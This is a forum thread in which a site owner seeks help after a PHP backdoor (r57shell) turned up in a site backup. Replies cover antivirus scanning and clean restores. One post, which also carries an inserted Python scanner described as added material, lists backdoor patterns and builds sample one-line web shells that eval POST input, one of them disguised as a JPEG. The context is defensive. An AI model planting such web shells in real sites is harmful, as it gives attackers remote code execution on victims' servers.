  1. #1 fs_tigre (SitePoint Evangelist)

    Hacker left a file called “PHP.RSTBackdoor”

    Hi,

    I’m going to start from the beginning. I recently had two of my sites hacked. When the first one was hacked 6 months ago, I basically uploaded new files, and after this I made a complete back-up thinking that all files were OK, since everything was working fine. Three days ago the other one was hacked, but this time I only replaced the index page with my back-up file.

    Reading different threads in this forum, I saw that somebody suggested scanning your computer, even Macs, which is what I’m running. So, last night I decided to install Norton and scanned my computer, and when it was done it found the back-up file I made after my first site was hacked. Apparently inside this back-up file there is a file called “PHP.RSTBackdoor”, which apparently is the one that contains the malicious code. I went and looked for this file on my server and I couldn’t find it.

    Is there a way to search for this file in my server?

    Is there some sort of software like Norton to scan your server? Or how about the method I just described - create a complete site back-up and then scan it with Norton on your computer - is this a valid option?

    Thanks a lot.
    Thank you very much!!!

  2. #2 Aleksejs
    Quote Originally Posted by fs_tigre:
    apparently inside this back-up file there is a file called “PHP.RSTBackdoor” which apparently is the one that contains the malicious code

    That is actually how the virus vendor names that particular virus/malware. It is not an actual filename. Some of your PHP/JS/HTML files contain malicious JavaScript. Namely, from the Symantec site: This threat requires the file r57shell.php to run. This file may already be present or may be manually copied to the compromised computer by the attacker.

    Quote Originally Posted by fs_tigre:
    Is there a way to search for this file in my server?

    Is there some sort of software like Norton to scan your server? Or how about the method I just described - create a complete site back-up and then scan it with Norton in your computer is this a valid option?

    The usual procedure is to download all files to a clean/uninfected PC and to scan them with your favourite virus-scanner.

  3. #3 fs_tigre
    First of all thank you for your help.

    Would you be so kind as to explain this a little bit more?

    Quote Originally Posted by Aleksejs:
    This threat requires the file r57shell.php to run.

    What is this file? Norton already repaired the affected file, sorry if I'm not understanding.

    Quote Originally Posted by Aleksejs:
    This file may already be present or may be manually copied to the compromised computer by the attacker.

    Can you explain this a little bit more?

    Thanks a lot for your help

  4. #4 Aleksejs
    I suppose your antivirus deleted that file when it detected it. Now, how that file got into your system in the first place - that is a good question. (~;

  5. #5 fs_tigre
    Quote Originally Posted by Aleksejs:
    I suppose your antivirus deleted that file, when detected.

    It asked me if I wanted to repair it or delete it. I clicked repair, but in the end I deleted the whole .rar backup file after Norton's repair.

    Quote Originally Posted by Aleksejs:
    Now, how that file got into your system in first place - that is a good question. (~;

    Well, as I said, it's the complete site back-up I downloaded.

    Thanks a lot for your help

  6. #6 (SitePoint Enthusiast, joined May 2010)
    I find that Sophos is better at detecting some of the backdoor files than most other AV programs.

    You can download your entire site - everything to your local PC. Then use Sophos, they have a 30 day trial, and scan all of your files. This won't find everything but it will find more than many of the other AVs.

    Typically the backdoors will do something like:

    isset($_POST['somevariable'])   or   if (!empty($_POST['somevariable']))

    then either @eval($_POST['somevariable']) or base64_decode($_POST['somevariable'])

    These are just basic examples of what to look for. We've tested other backdoor "finders", some with over 4400 signatures, and rarely do they find more than one or two backdoors on a website that we've found over 20 on. Not promoting, just stating that these backdoors are difficult to find.
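    A small triage scanner built around that description, as an added example that is not code from this thread or from any of the products mentioned in it: it walks a downloaded copy of a site, ignores what the file extension claims, and flags files where a superglobal value feeds eval() or base64_decode(), or where a PHP open tag sits inside a file named like an image. The sample site tree it scans is constructed inline, and the indicator set is a hypothetical triage heuristic, not any vendor's signature set.

```python
import re
import tempfile
from pathlib import Path

# Indicators based on the thread's description of typical PHP backdoors:
# a value from a superglobal flowing into eval()/base64_decode(), and PHP code
# hiding inside something named like an image. Hypothetical triage heuristics
# for this example, not a vendor signature set.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "superglobal": re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\["),
    "php_tag": re.compile(r"<\?php|<\?="),
}
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif", ".ico"}


def classify(text, suffix):
    """Return the reasons a file looks like a backdoor (empty list = nothing found).

    A lone base64_decode() or $_POST read is normal in legitimate code, so only
    the combination of user input plus eval/base64_decode is reported; a PHP
    tag inside a file with an image extension is reported on its own."""
    hit = {name for name, rx in INDICATORS.items() if rx.search(text)}
    reasons = []
    if "superglobal" in hit and ("eval" in hit or "base64_decode" in hit):
        reasons.append("input-to-eval")
    if suffix.lower() in IMAGE_EXT and "php_tag" in hit:
        reasons.append("php-in-image")
    return reasons


def scan_tree(root):
    """Walk every file under root (extensions are not trusted) and map
    relative path -> reasons for each file that gets flagged."""
    root = Path(root)
    flagged = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        # Real binary images decode with replacement characters; the regexes
        # still find a PHP block injected into the middle of them.
        text = path.read_bytes().decode("utf-8", errors="replace")
        reasons = classify(text, path.suffix)
        if reasons:
            flagged[path.relative_to(root).as_posix()] = reasons
    return flagged


def build_sample_site():
    """Create a constructed (not real) downloaded-site tree in a temp dir:
    two clean files and two files carrying the patterns from the thread."""
    root = Path(tempfile.mkdtemp(prefix="site_"))
    samples = {
        # clean: legitimate base64 use, no user input involved
        "index.php": b"<?php $logo = base64_decode($embedded_logo); echo $logo; ?>",
        # clean: reads $_POST but only escapes and echoes it
        "includes/form.php": b"<?php echo htmlspecialchars($_POST['name'] ?? ''); ?>",
        # backdoor: the empty()/eval shape described in the thread
        "cache/x.php": (b"<?php if(!empty($_POST['k'])) { "
                        b"@eval(base64_decode($_POST['k'])); } ?>"),
        # backdoor masked as a picture: JPEG magic bytes, then PHP
        "uploads/logo.jpg": b"\xff\xd8\xff\xe0JFIF<?php @eval($_POST['cmd']); ?>",
    }
    for rel, data in samples.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(data)
    return str(root)


if __name__ == "__main__":
    for rel, why in scan_tree(build_sample_site()).items():
        print(f"{rel}: {', '.join(why)}")
```

    Point it at the directory you pulled down over FTP and treat the hits as a review list rather than a verdict: legitimate code also calls base64_decode() and reads $_POST, which is why a single indicator is deliberately not enough to flag a file, and checking every file rather than only *.php is what catches a shell that has been given an image name.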

  7. #7 (SitePoint Enthusiast, joined May 2010)
    I forgot, ClamAV is also good at detecting many backdoors. I haven't used the Windows version but the Linux version is great. I believe they both use the same signatures so the Windows version should be able to detect any backdoor that the Linux version does.

    Just an FYI...

  8. #8 fs_tigre
    First of all thank you for your help!

    Quote Originally Posted by the previous poster:
    You can download your entire site - everything to your local PC.

    Excuse my ignorance, but when you say the entire site, this means the public folder only, right?

    Quote Originally Posted by the previous poster:
    I find that Sophos is better at detecting some of the backdoor files than most other AV programs.

    So Norton is not a good program for this type of task?

    Learning a lot as I go... thanks to this forum (you guys)

    Thanks a lot!

  9. #9 Mittineague (Programming Team)
    Quote Originally Posted by fs_tigre:
    .....
    Excuse my ignorance but when you say the entire site this means the public folder only right?
    .....

    If you're on a shared host you should be able to download everything in your domain folder: the "public" folder and its "sibling" folders too. You won't be able to go above your domain folder - i.e. access other sites and host-only folders - that's where the importance of reporting the incident to your host comes in.

  10. #10 (SitePoint Enthusiast, joined May 2010)
    As Mittineague has already stated, everything in your public folder and its sibling folders. Basically everything you have access to with FTP. Keep in mind that when a hacker gets control of your website, they have at least the same access as you do. So whatever you have access to on a shared host is what you want to download to your PC.

  11. #11 fs_tigre
    Thanks a lot for your input.

    I already informed my host.

    Can I use Norton to scan my files? Will it detect and fix malicious files?

    Thanks a lot.

  12. #12 (SitePoint Enthusiast, joined May 2010)
    Some - yes. Not all of them.

  13. #13 fs_tigre
    Thank you for your help

  14. #14 Crazybanana (SitePoint Wizard)
    just a little info here...

    the PHP.RSTBackdoor is just the threat name, not the file name.

    ..and the r57shell.php is an advanced shellscript. it contains a dashboard with, among other things, a vulnerability scanner; you can set file permissions, it has ftp, etc etc... it's like an advanced toolbox.

    someone most likely scanned your site/host and found a vulnerability, and then they exploited it, got the script installed and opened a backdoor... and did whatever else they wanted.

    it can be embedded in other legal files or masked as a pic or something else, so make sure to search your files and folders for any suspicious files or code.

    looks like when you downloaded your site for a backup, you downloaded it with the script installed - you didn't clean it before you downloaded it, nor did you do it afterwards - make sure to have a clean backup so you don't install an infected backup.

    too many people make this mistake - uploading an infected backup, and history repeats itself...


  15. #15 fs_tigre
    Thanks a lot for your comments!

  16. #16 (SitePoint Enthusiast, joined Nov 2008)
    Btw, if you are on a shared host with cPanel, you may have an inbuilt antivirus facility too (my fav: clamav). Scan your uploaded contents with the antivirus online itself. Generally it is a better idea to delete the infected files there and reupload clean copies of the deleted contents.

    Also boot your PC with a clean bootable disk and scan your PC with an antivirus (like AVG Free), and try a spyware scan too (use Spybot or SUPERAntiSpyware - all free).

  17. #17 fs_tigre
    Thanks a lot for your comments!

    Yes, I just noticed that I do have antivirus in my Cpanel.

    Thanks